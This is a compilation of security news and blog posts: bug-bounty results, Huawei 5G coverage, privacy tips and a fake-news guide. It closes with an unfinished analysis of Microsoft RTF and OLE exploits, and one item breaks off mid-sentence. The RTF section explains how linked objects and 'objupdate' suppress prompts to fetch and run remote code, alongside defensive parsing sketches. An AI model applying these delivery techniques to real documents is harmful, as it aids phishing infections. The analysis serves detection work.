  • Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we’re adding in a 50% bonus, making the top prize $1.5 million. See our program rules page for more details around our new exploit categories and rewards.
  • Abuse VRP engaged in outreach and education to increase researchers' awareness of the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK, and the US.
  • The Google Play Security Reward Program expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.
  • The Developer Data Protection Reward Program was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.

We also had the goal of increasing engagement with our security researchers over the last year at events such as BountyCon in Singapore and ESCAL8 in London. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.

A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations. Follow us on @GoogleVRP

*The total amount was updated on January 28; it previously said we paid out more than $15 million in rewards.

Huawei set for limited UK 5G role, but can we Trust Huawei?

Today the UK Government decided Huawei can be allowed to help build the UK's 5G network, but the company remains banned from supplying kit to "sensitive parts" of the core network. The Prime Minister, Boris Johnson, made the long-awaited decision, ending months of concern for the Chinese telecoms giant.

The PM had briefed US President Donald Trump about the decision. Trump has been very vocal about his stance, exclaiming, “we are not going to do business with Huawei”, and his administration is reportedly nearing publication of a rule that could further block shipments of US-made goods to Huawei. The Trump administration has said it 'is disappointed' with the UK government's decision. China had warned the UK there could be "substantial" repercussions to other trade and investment plans had the company been banned outright.

There was ferocious debate in the UK parliament following the government's announcement, with MPs calling into question the cybersecurity risks that could prevail: the US says the cybersecurity risks are severe, the UK's security services say they can be managed, whereas Australia has opted for an outright ban. There is a clear disconnect, and today's decision could cause turmoil in the US/UK working relationship that could ultimately impact a post-Brexit trade deal.

Can Huawei be trusted, or will using its equipment leave communication networks, and our own mobile phones, vulnerable? The US says Huawei is a security risk, given that the firm is heavily state supported and is run by Mr Ren, who served in the Chinese military. In this view, Huawei 5G equipment could be used for spying and for damaging critical national infrastructure.

The National Cyber Security Centre (NCSC) published a document which says UK networks will have three years to comply with the caps on the use of Huawei's equipment.

"Huawei is reassured by the UK government's confirmation that we can continue working with our customers to keep the 5G rollout on track. It gives the UK access to world-leading technology and ensures a competitive market." the firm's UK chief Victor Zhang said in a statement.

UK security professionals have reported significant concerns around how digital transformation projects and the implementation of 5G will affect their risk posture. 89% of UK businesses said they have concerns around the implementation of emerging technologies and essential digital transformation projects and almost four in ten (38%) expect digital transformation and 5G to offer cybercriminals more effective and more destructive methods of achieving their nefarious goals, according to research from VMWare Carbon Black.

A10 Networks' VP of Strategy, Gunter Reiss, said: “The global dispute over whether tech giant Huawei should be used in national 5G networks has created a lot of geopolitical conversations around the 5G build-out, security of Critical National Infrastructure, and generally whether certain vendors should be included or excluded. However, operators need to base their decisions not on these opinions but on technology – the strength, innovation and security capabilities. With the massive increases in bandwidth, the number of devices predicted to be on these networks and the growing security requirements, the technology being used must meet these needs.”


A Security Compromise on Economic Grounds
"This is a good compromise between alleviating 'security' concerns and making sure that the 5G UK market is not harmed," commented Dimitris Mavrakis, a telecoms analyst at ABI Research. Previously I posted about the national security vs. economic argument behind the UK government's decision; see The UK Government Huawei Dilemma and the Brexit Factor.

Top 10 Cloud Privacy Recommendations for Consumers

It’s Data Privacy Day and when it comes down to it, most of us don’t know exactly how many organizations have our data—let alone how it’s being collected or what it is being used for. Unfortunately, the stakes are higher than ever for those who are unwilling to take appropriate safeguards to defend their personal data, including identity theft, financial loss, and more.

While the cloud presents a wealth of opportunity for increased productivity, connectivity and convenience, it also requires a new set of considerations for ensuring safe use. There are many, but here are the top ten:

1. Don’t reuse passwords.

Password reuse is a common problem, especially in consumer cloud services. If you reuse passwords, you only need one of your cloud services to be breached—once criminals have stolen your credentials through one service, they potentially have access to every account that shares those same credentials, including banking platforms, email and other services where sensitive data is stored. When using a cloud service for the first time, it’s easy to think that if the data you are using in that particular service isn’t confidential, then it doesn’t matter if you use your favorite password. But a good way to think of it is this: many passwords, one breach. One password… (potentially) many breaches. If you’re concerned about being able to remember them, look into obtaining a password manager.

2. Don’t share folders, share files

Many cloud services allow collaboration or file sharing. If you only want to share a few files, share those and not a complete folder. It’s all too easy to over-share without realizing what else is in the folder—or to forget who you shared it with (or that you shared it at all!) and later add private files that were never meant to be disseminated.

3. Be careful with auto-sync (it could bring in malware)

If you share a folder with someone else, many cloud services provide auto-sync, so that when another user adds new files, they get synced to everyone in the share. The danger here is that if someone you are sharing with gets infected by malware, this malware could be uploaded to the cloud and downloaded to your devices automatically.

4. Be careful of services that ask for your data

When logging into a new service, you may be asked for some personal data; for example, your date of birth. Why should they ask, and what will they do with this information?  If they can tie that to your email address, and another service obtains your zip-code and a third service asks for your mobile number, you can see that anyone collating that information could have enough to try to steal your identity. If there’s no reason why a service should have that data, use a different service (or, at least, give them incorrect information).

5. Read EULA & privacy policies – who owns the data?

I know this sounds hard, but it is worth it: Does the cloud provider claim that they own the data you upload? This may give them the right, or at least enough rights in their own mind, to sell your data to data brokers. This is more common than you think—you should never use a service that claims it owns your data.

6. Think twice about mobile apps and their data collection

Many cloud services have a mobile app as a way to access their service. Before using a mobile app, look at the data it says it will collect. Often the app collects more data than would be collected if you were to access the service via browser.

7. If unsure, ask your IT department if they have reviewed the service.

Some organizations’ IT departments will have already reviewed a cloud service and decided if it is acceptable for corporate use. It’s in their interest to keep their users secure, especially as so many devices now contain both personal and business data. Ask them if they have reviewed a service before you access it.

8. Don’t use public Wi-Fi hotspots without using a VPN for encryption.

Public Wi-Fi can be a place for data interception. Always use a VPN or encryption technology to ensure data is encrypted between your device and cloud services when on a public Wi-Fi.

9. Enable multi-factor authentication.

Cloud services that are well designed will offer additional security services, such as multi-factor authentication. Use those, and any other security features that you can.

10. Don’t share accounts with friends and family.

It’s often second nature to share with our friends and family. But are they as concerned about privacy as you are? Don’t share accounts, otherwise if they let their guard drop, your data could be compromised.

Check out more ways to take action and protect your data. 

Take a look at our additional resource for safeguarding your personal data in the cloud.

The post Top 10 Cloud Privacy Recommendations for Consumers appeared first on McAfee Blogs.

Take Action This Data Privacy Day

We all know that data breaches have been on the rise, and hackers are finding clever, new ways to access our devices and information. But sometimes it takes a little push to get us to take action when it comes to protecting our most sensitive information. That’s why this Data Privacy Day, on January 28th, we have the perfect opportunity to own our privacy by taking the time to safeguard data, and help others do the same.

After all, there are now roughly four billion consumers connected online, living various moments of truth that could potentially put them at risk. From sharing photos and socializing with friends, to completing bank transactions—people expect to do what they desire online whenever and wherever they want. But as the saying goes, “with great power comes great responsibility”, and it is imperative that consumers take accountability, not just by enjoying the advantages of connecting online, but by protecting their online identities, too.

Remember, your personal information and online presence are as valuable as money, and what you post online can last a lifetime. Data Privacy Day is a reminder for everybody to make sure that they are protecting what matters most to them: their personal data, as well as their families and friends.

So, let’s get started. Even if you have a large online footprint, protecting this information doesn’t have to be overwhelming.

Here are a few tips:

Update your privacy and security settings—Begin with the websites and applications that you use the most. Check to see if your accounts are marked as private, or if they are open to the public. Also, look to see if your data is being leaked to third parties. You want to select the most secure settings available, while still being able to use these tools correctly.  Here’s a guide from StaySafeOnline to help you get started.

Start the New Year with a new digital you— When opening new online accounts for sharing personal information such as your email address or date of birth, create a new digital persona that has alternative answers that only you would know. This will limit online tracking of your real personal information.

Lock down your logins—At the same time, secure your logins by making sure that you are creating long and unique passphrases for all of your accounts. Use multi-factor authentication when available. This is a security protocol that takes more than just one step to validate your login, such as a password plus a code sent to your mobile device, or a fingerprint. It is exponentially more secure than a simple password.

Spread the word and get involved— Once you have done your own privacy check, help others do the same. It’s important that we all feel empowered to protect our privacy, so share the safety tips in this article with your family, coworkers, and community. Here are some helpful resources to create privacy awareness where you live.

Protect your family and friends – If you are a parent, you can make a big difference by helping raise privacy-savvy kids. After all, today’s kids represent the future of online security. If they start building their digital footprints with solid safety habits, it makes all of us more secure.

Begin with this handy tip sheet.

Own your information—It’s time for everyone to feel empowered to own their information. While there will always be online threats, you can minimize any potential harm by committing yourself to the action steps we listed above. Once you have, spread the word by using the hashtag #privacyaware on Twitter, Instagram, or Facebook.

Let’s make this 12th annual international Data Privacy Day the most effective ever! Stay up to date with all the event happenings, here, and keep informed year-round on the latest threats and security tips.

The post Take Action This Data Privacy Day appeared first on McAfee Blogs.

NIST Tests Forensic Methods for Getting Data From Damaged Mobile Phones

Criminals sometimes damage their mobile phones in an attempt to destroy evidence. They might smash, shoot, submerge or cook their phones, but forensics experts can often retrieve the evidence anyway. Now, researchers at the National Institute of Standards and Technology (NIST) have tested how well these forensic methods work. A damaged phone might not power on, and the data port might not work, so experts use hardware and software tools to directly access the phone’s memory chips. These include hacking tools, albeit ones that may be lawfully used as part of a criminal investigation. Because

Cyber Threat Trends Dashboard

Introduction

Information sharing is one of the most important activities that cybersecurity researchers carry out on a daily basis. Thanks to “infosharing” activities it is possible to block or, in specific cases, even prevent cyber attacks. Most infosharing activities in cybersecurity focus on Indicators of Compromise (IOCs) such as URLs, IPs, domains, and file hashes, which are used to arm protection tools such as proxies, next-generation firewalls, and antivirus engines.

Collecting and analyzing publicly available samples every single day, I became more and more interested in the evolution of cyber threats (cyber threat trends) rather than in single, specific analyses, which, after hundreds of them, can get boring (no more excitement in analyzing the next ransomware or a new Emotet version 😛 ). APTs are another cup of tea (there is a lot of passion in understanding their next steps). So I decided to develop a super simple dashboard showing, in near real time (as soon as my analyses are done), the threat trends observed over the days. The dashboard is available HERE (top menu TOOLS => Cyber Threat Trends). So far only a few basic pieces of information are shown; if you would like to see more stats/graphs/info, please feel free to contact me (HERE).

Description

The aim of this dashboard is to monitor trends over thousands, even millions, of samples, providing quantitative analysis of what has been observed during the automated analyses. The data in this dashboard is totally auto-generated, without manual control and with no post-processing. You should consider it raw data on which to start your own research, applying your personal filters or considerations. If you do that, be aware that false positives could be around the corner. Let’s move on to the current graphs and what I’d like to show with them; before digging in, note that all the figures on the graphs express percentages, not absolute numbers. Now let’s look at each of them.

  • Malware Families Trends. Detection distribution over time. In other words, the time frames in which specific families are most active with respect to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples are not classified into a family; this happens when no signature matches the sample or when multiple family signatures match the same sample. In both cases I cannot be sure which family the sample belongs to, so it is classified as "unknown" and not visualized on this graph. The missing slice of the cake is attributed to "unknown".
  • Distribution Types. Based on the file's magic bytes, this graph tracks the percentages of file types that malware uses as a carrier.
  • Threat Level Distribution. Levels run from 0 to 3, getting more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to see whether malware or false positives are hiding among them. For that reason a dedicated graph named Unknown Families Threat Level Distribution has been created.
  • TOP domains, TOP processes and TOP File Names. With a sliding window over the last 300 analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names (a minimal sketch of this sliding-window counting follows this list). Again, there is no filter and no post-processing analysis on those fields, meaning you could well find "google.com" or "microsoft update" as a TOP domain, which is fine: if the sample queried them before performing its malicious intent, it is simply recorded and brought to your attention. Same cup of tea with processes and file names. Indeed, those fields include the term "involved" in their title; if something is involved it does not mean that it is malicious, only that it appears in a malicious chain.
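
For readers who want to reproduce this kind of ranking on their own data, the following is a minimal sketch of a sliding-window frequency count (my own illustration, not the dashboard’s actual backend): it keeps the domains contacted by the last 300 analyzed samples and reports the most frequent ones.

from collections import Counter, deque

WINDOW_SIZE = 300                      # last N analyzed samples, as described above

window = deque(maxlen=WINDOW_SIZE)     # oldest sample falls out automatically
counts = Counter()

def record_sample(domains):
    """Add the domains contacted by one analyzed sample to the window."""
    if len(window) == window.maxlen:
        # the deque is about to evict its oldest entry: remove its counts first
        for d in window[0]:
            counts[d] -= 1
            if counts[d] == 0:
                del counts[d]
    window.append(tuple(domains))
    counts.update(domains)

def top_domains(n=10):
    """Return the n most frequently contacted domains inside the window."""
    return counts.most_common(n)

# toy usage with made-up data
record_sample(["google.com", "evil.example"])
record_sample(["evil.example"])
print(top_domains(5))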

Conclusion

The dashboard introduced here is part of my contribution to the cybersecurity community, like every free tool released in the “Tools” menu. Cyber Threat Trends evolves dynamically over time, and you might find it useful for answering questions about live statistics on cybersecurity threats. If you are a journalist or a cybersecurity enthusiast, you might find there some answers to trending questions, elaborated over time.

Boris Johnson gets final warning with Huawei 5G verdict imminent

Former senior government figures voice security fears as PM chairs meeting of NSC

Former ministers have sounded their final warnings to Boris Johnson about the Chinese telecoms firm Huawei ahead of his expected decision on whether it will play a part in the UK’s 5G network.

The prime minister will chair a meeting of the national security council (NSC) later on Tuesday before making a judgment on the firm’s future in the country after months of concern around security, including from the US president, Donald Trump.

5G is the next generation mobile phone network and it promises much higher connection speeds, lower latency (response times) and to be more reliable than the creaking 4G networks we have now.

Huawei is a Chinese telecoms company founded in 1987. US officials believe it poses a security risk because the Chinese government will make the firm engineer backdoors in its technology, through which information could be accessed by Beijing. Donald Trump has banned US companies from sharing technology with Huawei and has been putting pressure on other nations to follow suit.

Continue reading...

Data Goes Supernova: Exploring Security at the Cloud Edge

Modern enterprises are fueled by data. The force of the cloud has been like gravity in a supernova, causing data to explode outward and disperse forever. No longer constrained by the network, the free flow of data to cloud service providers and a wide range of devices fragments visibility and control for enterprise security.

In our latest study on cloud adoption and risk, we traverse the paths of enterprise data as it disperses beyond the network perimeter. Through this research, which combines survey results from 1,000 enterprises in 11 countries and anonymized event data from 30 million enterprise cloud users, we are able to uncover the new areas of risk every enterprise must address in our cloud-first world.

To jump in now, download the full report here: Enterprise Supernova: The Data Dispersion Cloud Adoption and Risk Report.

In the report we evaluate three areas of context that together address the dispersion of data to the cloud:

  1. Cloud context: Data protection must understand the creation and flow of data within the cloud, through collaboration and inter-cloud sharing.

Twelve percent of files shared in the cloud contain sensitive data, an increase of 57% year over year.

  2. Device context: IT needs the ability to understand whether sensitive data is being accessed by a personal device or one it controls. Data loss to personal, unmanaged devices cannot be remediated.

Only 41% of companies can control personal device access to their data in the cloud.

  3. Web context: The continuous expansion of cloud services is impossible to predict, requiring rules that manage access through the web before data reaches an unknown cloud destination.

C-Level IT leaders see the risk of “Shadow IT,” while manager-level decision makers are less likely to report risk to their data from unsanctioned applications.

This is just a preview of the findings in this study. For the full story, download the entire report here: Enterprise Supernova: The Data Dispersion Cloud Adoption and Risk Report.

The post Data Goes Supernova: Exploring Security at the Cloud Edge appeared first on McAfee Blogs.

Forrester Study on the Benefits of Cloud vs. On-Premises AppSec

Veracode recently commissioned Forrester Consulting to conduct research on the Total Economic Impact™ of using a cloud-based application security (AppSec) solution versus an on-premises solution. To collect information on the benefits and risks associated with the solutions, Forrester interviewed four customers who have used Veracode as well as a variety of on-premises application security solutions. The data presented four business benefits and average cost savings associated with using SaaS-based AppSec:

Improved speed to scale saves 200 hours, annually

On average, it takes approximately 33 hours to set up an AppSec server and 216 hours for annual maintenance. By using a cloud-based solution, like Veracode, organizations avoid server costs, which improves speed to scale and saves more than $1.3 million over three years.

Faster time to market leads to an additional $888,000 in annual profit

Veracode Greenlight is a unique tool that performs security scans as developers are coding. By catching flaws during development, code is updated faster, and products and updates are typically released three months sooner than if conducting post-deployment scans. Gaining an additional three months of profit on every application could translate to millions saved over the course of a few years.

Annual legacy application costs of $1.86 million are avoided

The study found that Veracode costs 20 percent less to operate than on-premises solutions. This means that by moving all legacy applications to a cloud-based solution, an organization would have lower operating costs, which could save, on average, almost $3.9 million over the course of three years.

Real-time flaw identification saves $4.4 million over three years

Veracode Greenlight not only leads to increased profits, it also leads to increased productivity for developers. Since they are able to see flaws while coding, they can make real-time edits, eliminating rework down the line. And the more productive developers are when eliminating flaws, the more productive the security teams are. This could lead to an average productivity savings of approximately $4.4 million over three years.

Download the full study, SaaS vs. On-premises: The Total Economic Impact™ of Veracode’s SaaS-based Application Security Platform, for a detailed analysis of cost savings and business benefits. In the report, you will also find additional baseline benefits attributed to using Veracode, as well as a comprehensive overview of the platform.

Where’s the Truth Online? How to Build Your Family’s Digital Discernment


Note: This is Part I of a series on equipping your family to fight back against fake news online.

Fake news is chipping away at our trust in the government, the media, and in one another. And, because our kids spend so much time in the online space, it’s more important than ever to help them understand how to separate truth from fiction.

How dangerous is the spread of misinformation? According to one study, 75% of people who see fake news believe it’s real. This inability to discern is at the core of how a false piece of information — be it a story, a photo, a social post, or an email — spreads like wildfire online.

Fake news erodes trust

A 2019 Pew Research Center study revealed that Americans rank fake news as a bigger problem in the U.S. than terrorism, illegal immigration, racism, and sexism, and believe the spread of fake news is causing ‘significant harm’ to the nation and needs to be stopped.

At the root of the issue is that too much news is coming at us from too many sources. True or not, millions of people are sharing that information, and they are often driven more by emotion than fact.

According to Author and Digital Literacy Expert Diana Graber, one of a parent’s most important roles today is teaching kids to evaluate and be discerning with the content they encounter online.

“Make sure your kids know that they cannot believe everything they see or read online. Give them strategies to assess online information. Be sure your child’s school is teaching digital literacy,” says Graber.

Kids encounter and share fake news on social networks, chat apps, and videos. Graber says the role of video as a fake news channel will grow as AI technology advances.

“I think video manipulation, such as deepfake videos, is a very important area to keep an eye on in the future. So much of the media that kids consume is visual, it will be important for them to learn visual literacy skills too,” says Graber.

The hidden costs of fake news

A December Facebook post warning people that men driving white vans were part of an organized human trafficking ring quickly went viral on several social networks.

Eventually, law enforcement exposed the post as fake; people shrugged it off and moved on. But in its wake, much was lost that didn’t go viral. The fake post was shared countless times. With each share, someone compromised a small piece of trust.

The false post caused digital panic and cast uncertainty on our sense of security and community. The post cost us money. The false information took up the resources of several law enforcement agencies that chose to investigate. It cost us trust. Public warnings even made it to the evening news in some cities.

The spread of fake news impacts our ability to make wise, informed decisions. It chips away at our expectation of truth in the people and resources around us.

Fake news that goes viral is powerful. It can impact our opinions about important health issues. It can damage companies and the stock market, and destroy personal reputations.

In the same Pew study, we learned about another loss — connection. Nearly 54 percent of respondents said they avoid talking with another person because that person may bring made-up news into the conversation.

The biggest loss? When it’s hard to see the truth, we are all less well informed, which creates obstacles to personal and cultural progress.

Family talking points

Here are three digital literacy terms defined to help you launch the fake news discussion.

  1. Fake news: We like the definition offered by PolitiFact: “Fake news is made-up stuff, masterfully manipulated to look like credible journalistic reports that are easily spread online to large audiences willing to believe the fictions and spread the word.” Discuss: Sharing fake news can hurt the people in the story as well as the credibility of the person sharing it. No one wants to be known for sharing sketchy content, rumors, or half-truths. Do: Sit down with your kids. Scroll through their favorite social networks and read some posts or stories. Ask: What news stories spark your interest, and why? Who posted this information? Are the links in the article credible? Should I share this piece of content? Why or why not?
  2. Objectivity: Content or statements based on facts that are not influenced by personal beliefs or feelings. Discuss: News stories should be objective (opinion-free), while opinion pieces can be subjective. When information (or a person) is subjective, you can identify personal perspectives, feelings, and opinions. When information (or a person) is objective, it’s void of opinion and based on facts. Do: Teaching kids to recognize objective vs. subjective content can be fun. Pick up a local newspaper (or access online). Read the stories on the front page (they should contain only facts). Flip to the Op-Ed page and discuss the shift in tone and content.
  3. Discernment: A person’s ability to evaluate people, content, situations, and things well. The ability to discern is at the core of decision-making. Discuss: To separate truth from fiction online, we need to be critical thinkers who can discern truth. Critical thinking skills develop over time and differ depending on the age group. Do: Watch this video from Cyberwise on Fake News. Sit down together and Google a current news story. Compare how different news sites cover the same news story. Ask: How are the headlines different? Is there a tone or bias? Which story do you believe to be credible, and why? Which one would you feel confident sharing with others?

The increase in fake news online has impacted us all. However, with the right tools, we can fight back and begin to restore trust. Next week, in Part II of this series, we’ll discuss our personal responsibility in the fake news cycle and specific ways to identify fake news.

The post Where’s the Truth Online? How to Build Your Family’s Digital Discernment appeared first on McAfee Blogs.

An Inside Look into Microsoft Rich Text Format and OLE Exploits

There has been a dramatic shift in the platforms targeted by attackers over the past few years. Up until 2016, browsers tended to be the most common attack vector used to exploit and infect machines, but now Microsoft Office applications are preferred, according to a report published here during March 2019. The increasing use of Microsoft Office as a popular exploitation target poses an interesting security challenge: weaponized documents in email attachments are a top infection vector.

Object Linking and Embedding (OLE), a technology based on the Component Object Model (COM), is one of the features in Microsoft Office documents that allows objects created in other Windows applications to be linked or embedded into documents, thereby creating a compound document structure and providing a richer user experience. OLE has been massively abused by attackers over the past few years in a variety of ways. OLE exploits in the recent past have been observed loading COM objects to orchestrate and control process memory, taking advantage of parsing vulnerabilities in COM objects, hiding malicious code, or connecting to external resources to download additional malware.

Microsoft Rich Text Format is heavily used in email attachments in phishing attacks. Its wide adoption in phishing attacks is primarily attributed to the fact that it can contain a wide variety of exploits and can be used efficiently as a delivery mechanism to target victims. Microsoft RTF files can embed various object types, either to exploit parsing vulnerabilities or to aid further exploitation. The Object Linking and Embedding feature in Rich Text Format files is largely abused either to link the RTF document to external malicious code or to embed other file format exploits within itself and use it as an exploit container. In short, the RTF file format is very versatile.

In the sections below, we outline some of the exploitation and infection strategies used in Microsoft Rich Text Format files over the recent past and then, towards the end, we reflect on the key takeaways that can help automate the analysis of RTF exploits and set the direction for a generic analysis approach.

RTF Control Words

Rich Text Format files are heavily formatted using control words. Control words in RTF files primarily define the way the document is presented to the user. Since these control words have associated parameters and data, errors in parsing them can become a target for exploitation. Exploits in the past have also been found using control words to embed malicious resources. Consequently, it is important to examine any destination control word that consumes data and to extract its stream. The RTF specification describes several hundred control words that consume data.

RTF parsers must also be able to handle the control word obfuscation mechanisms commonly used by attackers, to further aid the analysis process. Below is an instance of a previous exploit using control word parameters to introduce an executable payload inside the datastore control word.
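
As a rough, self-contained illustration of that triage step (my own sketch, not code from the exploit referenced above), the following scans an RTF file for a few data-consuming destination control words and reports roughly how many bytes of hex-encoded data each carries; unusually large datastore or objdata payloads are a useful signal for deeper inspection.

import re
import sys

# A few destination control words known to carry embedded data; the RTF
# specification defines several hundred, so treat this list as illustrative.
DESTINATIONS = (b"datastore", b"objdata", b"themedata", b"colorschememapping")

def data_runs(rtf_bytes):
    """Yield (control word, approximate payload size in bytes) pairs."""
    for word in DESTINATIONS:
        # crude match: the control word followed by its run of hex characters;
        # a real parser must track brace nesting and de-obfuscate instead
        pattern = rb"\\" + word + rb"\b([0-9a-fA-F\s]+)"
        for m in re.finditer(pattern, rtf_bytes):
            hex_chars = re.sub(rb"\s", b"", m.group(1))
            yield word.decode(), len(hex_chars) // 2

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        data = f.read()
    for name, size in data_runs(data):
        print(f"{name}: ~{size} bytes of embedded data")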

Overlay Data in RTF Files

Overlay data is additional data appended to the end of an RTF document. It is predominantly used by exploit authors to embed decoy files or additional resources, either in the clear or in encrypted form, the latter usually being decrypted when the attacker-controlled code executes. Overlay data beyond a certain size should be deemed suspicious and must be extracted and analysed further; note that the Microsoft Word RTF parser simply ignores overlay data while processing RTF documents. Below are some instances of RTF exploits with a large volume of overlay data appended at the end of the file, with CVE-2015-1641 embedding both the decoy document and multi-staged shellcodes with markers.
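
One simple way to carve that appended data, sketched below under the assumption that the well-formed document ends when its top-level brace group closes, is to walk the braces and treat everything after the final closing brace as overlay (this is an illustrative sketch, not a production carver):

import sys

def rtf_body_end(data):
    """Offset just past the closing brace of the top-level RTF group."""
    # Simplified: escaped braces are not handled here.
    depth = 0
    for offset, byte in enumerate(data):
        if byte == ord("{"):
            depth += 1
        elif byte == ord("}"):
            depth -= 1
            if depth == 0:
                return offset + 1
    return len(data)                    # unbalanced braces: treat as no overlay

def extract_overlay(path, min_size=1024):
    with open(path, "rb") as f:
        data = f.read()
    overlay = data[rtf_body_end(data):]
    return overlay if len(overlay) >= min_size else b""

if __name__ == "__main__":
    overlay = extract_overlay(sys.argv[1])
    print(f"overlay bytes appended after the RTF body: {len(overlay)}")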

Object Linking and Embedding in RTF Files

Linked or embedded objects in RTF documents are represented as RTF objects, specifically via the RTF destination control word "object". The data for the embedded or linked object is stored as the parameter to the RTF sub-destination control word "objdata" in the hex-encoded OLESaveToStream format. The modifier control word "objclass" determines the type of the object embedded in the RTF file and helps the client application render the object. However, the hex-encoded object data supplied as the argument to the "objdata" control word can also be heavily obfuscated, either to make reverse engineering and analysis more time consuming or to break immature RTF parsers. OLE has been one of the dominant attack vectors in the recent past, with many instances of OLE-based exploits used in targeted attacks, which means that robust RTF parsers for extracting objects, along with deeper inspection of the object data, are extremely critical.
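
To make that concrete, here is a simplified sketch of my own (not a production parser) that pulls the hex argument of each objdata destination, strips whitespace obfuscation, and checks whether the decoded bytes contain the OLE2 compound file signature D0 CF 11 E0:

import binascii
import re
import sys

OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")    # compound file binary format header

def extract_objdata(rtf_bytes):
    """Yield decoded object blobs for each objdata destination found."""
    # Simplified: assumes plain hex; real samples interleave control words,
    # comments and mixed case precisely to break naive extractors like this.
    for m in re.finditer(rb"\\objdata\b([0-9a-fA-F\s]+)", rtf_bytes):
        hexdata = re.sub(rb"\s", b"", m.group(1))
        if len(hexdata) % 2:                     # tolerate a trailing stray nibble
            hexdata = hexdata[:-1]
        yield binascii.unhexlify(hexdata)

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        data = f.read()
    for i, blob in enumerate(extract_objdata(data)):
        wrapped_ole2 = OLE_MAGIC in blob         # OLE2 doc wrapped in the OLE1 native stream
        print(f"objdata #{i}: {len(blob)} bytes, OLE2 header present: {wrapped_ole2}")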

Object Linking – Linking RTF to External Resource

Using object linking, it is possible to link an RTF file to a remote object, which could be a malicious resource hosted on a remote server. This leads the resulting RTF file to behave as a downloader and subsequently execute the downloaded resource by invoking the registered application-specific resource handlers. Inspecting the modifier control words accompanying "object", linked objects are indicated by another nested control word, "objautlink", as represented below in the RTF document.

As indicated in the above representation, the object data supplied as the argument to the RTF control word "objdata" is an OLE1.0NativeStream in the OLESaveToStream format, followed by the NativeDataSize indicating the size of the OLE2.0 compound document wrapped in the NativeStream. As per the Rich Text Format specification, if the object is linked to the container application, which in this case is the RTF document, the Root Storage directory entry of the compound document will have the CLSID of StdOleLink, indicating a linked object. Also, when the object is in the OLE2.0 format, the linked source data is specified in the MonikerStream of the OLEStream structure. As highlighted below, while parsing the object data, the ole32.OleConvertOLESTREAMToIStorage function is responsible for converting the OLE1.0 NativeStream data to the OLE2.0 structured storage format. Following the pointer to the OLE stream lpolestream allows us to visualize the parsed, extracted native data. Below is a memory snapshot from when an RTF document with a linked object was parsed by the winword.exe process.

Launching an RTF document with a link to an external object will display a dialog box asking whether to update the data from the linked object, as shown below.

However, this is not an ideal exploitation strategy for targeting victims. The prompt can be eliminated by inserting another modifier control word, "objupdate", which internally calls the link object's IOleObject::Update method to update the link's source.

Subsequently, urlmon.dll, which is the registered server for the URL Moniker, is instantiated.

Once the COM object is instantiated, a connection is initiated to the external resource and, based on the content-type header returned by the server in the response, the URL Moniker consults the MIME database in the registry and invokes the registered application handlers.

Details on how the URL Moniker is executed, and the algorithm used to determine which handlers to invoke, are described by Microsoft here. We have seen multiple such RTF exploits in the past, including CVE-2017-0199, CVE-2017-8759 and others, using Monikers to download and execute remote code.

The COM objects used in the mentioned exploits have since been blacklisted by Microsoft in newer versions, but similar techniques could be used in the future, which essentially necessitates the analysis of OLE structured storage streams.

Object Embedding – RTF Containing OLE Controls

As indicated earlier, embedded objects are represented in the container documents in the OLE2 format. When the object is stored in the OLE2 format, the container application (here, the Rich Text Format file) creates the OLE compound file storage for each embedded object, and the respective object data is stored in OLE compound file stream objects. The layout of container documents storing embedded objects is represented below and described in the Microsoft documentation here.

RTF exploits have historically been found embedding and loading multiple OLE controls in order to bypass exploit mitigations and to take advantage of memory corruption vulnerabilities by loading vulnerable OLE controls. Embedded OLE controls in an RTF document are usually indicated by the nested control word "objocx" or "objemb", followed by "objclass" with the name of the OLE control to render the object as its argument. Below is an example of a previous exploit used in targeted attacks, which exploited a vulnerability in a COM object and loaded another OLE control, with staged malicious code embedded, to aid the exploitation process. Clearly, it is critical to extract this object data, parse the OLE2 compound file storage, and extract each of the stream objects for further inspection for hidden malicious shellcode.

Object Embedding – RTF Containing Other Documents

Malicious RTF documents can use the OLE functionality to embed other file formats, like Flash files and Word documents, either to exploit the respective file format vulnerabilities or to further assist and set the stage for a successful exploitation process. Multiple RTF exploits have been observed in the past embedding OOXML documents via OLE in order to manipulate the process heap memory and bypass Windows exploit mitigations. In RTF files, embedded objects are usually indicated by the nested control word "objemb" with a version-dependent ProgID string as the argument to the nested control word "objclass". One such RTF exploit used in targeted attacks in the recent past is shown below.

Below is another instance where a PDF file was physically embedded within the compound document. As mentioned, the embedded object is stored physically along with all the information required to render it.

In the embedded object, the creating application’s identifier is stored in the CLSID field of the compound file directory entry of the CFB storage object. If we take a look at the previous instance, when the object data is extracted and inspected manually, the following CLSID is observed in the CFB storage object, which corresponds to the CLSID_Microsoft_Word_Document.

When the OLE2 stream objects are parsed and the embedded OOXML is extracted and analysed after deflating its contents, we see suspicious ActiveX object loading activity and embedded malicious code in one of the binary files. Clearly, it is important to extract the files embedded in RTF documents and analyse them further.
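
To automate that kind of inspection, a decoded object blob (for example, one produced by the earlier objdata sketch) can be opened with the open-source olefile library to enumerate its storages and streams and read the root CLSID. This is a minimal sketch of mine, not tooling from the original analysis:

import io
import olefile                                   # open-source olefile package

def inspect_ole_blob(blob):
    """List storages/streams and the root CLSID of an OLE2 compound file blob."""
    ole = olefile.OleFileIO(io.BytesIO(blob))
    try:
        # CLSID of the root storage identifies the creating application,
        # e.g. the Word document CLSID mentioned above
        print("root CLSID:", ole.root.clsid)
        for entry in ole.listdir(streams=True, storages=True):
            name = "/".join(entry)
            if ole.get_type(entry) == olefile.STGTY_STREAM:
                print(f"  stream  {name} ({ole.get_size(entry)} bytes)")
            else:
                print(f"  storage {name}")
    finally:
        ole.close()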

OLE Packages in RTF Files

